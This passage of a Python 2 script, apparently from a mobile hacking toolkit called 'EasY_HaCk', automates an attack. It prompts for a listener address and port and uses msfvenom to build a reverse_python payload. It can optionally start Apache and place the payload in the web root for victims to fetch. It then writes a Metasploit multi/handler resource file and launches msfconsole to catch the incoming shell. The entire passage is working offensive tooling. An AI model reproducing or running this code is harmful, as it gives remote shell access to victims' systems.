293 | def python(): |
294 | lhost = raw_input("Enter LHOST: ") |
295 | lport = raw_input("Enter LPORT: ") |
296 | name = raw_input("Enter Payload Name: ") |
297 | os.system("msfvenom -p cmd/unix/reverse_python LHOST=%s LPORT=%s -f raw > /sdcard/EasY_HaCk/%s.py"%(lhost,lport,name)) |
298 | clear() |
299 | print "Payload Successfuly Generated" |
300 | print "[1]-Do You Want To Start a listenner" |
301 | print "[2]-Do You Want To Start an IP Poisener " |
302 | li = raw_input() |
303 | if li == '2' : |
304 | os.system('rm $PREFIX/var/run/apache2/httpd.pid') |
305 | os.system('apachectl start') |
306 | os.system('cp /sdcard/EasY_HaCk/%s.py $PREFIX/share/apache2/default-site/htdocs/zaki/'%(name)) |
307 | os.system('clear') |
308 | print "Your IP Successfully Poisened :\033[0m http://%s:8080/zaki/%s.py"%(lhost,name) |
309 | listen = """ |
310 | use exploit/multi/handler |
311 | set PAYLOAD cmd/unix/reverse_python |
312 | set LHOST {0} |
313 | set LPORT {1} |
314 | exploit |
315 | """.format(lhost,lport) |
316 | with open('listener.rc', 'w') as f : |
317 | f.write(listen) |
318 | os.system('msfconsole -r listener.rc') |
319 | |
320 | else : |
321 | listen = """ |
322 | use exploit/multi/handler |
323 | set PAYLOAD cmd/unix/reverse_python |
324 | set LHOST {0} |
325 | set LPORT {1} |
326 | exploit |
327 | """.format(lhost,lport) |
328 | with open('listener.rc', 'w') as f : |
329 | f.write(listen) |
330 | os.system('msfconsole -r listener.rc') |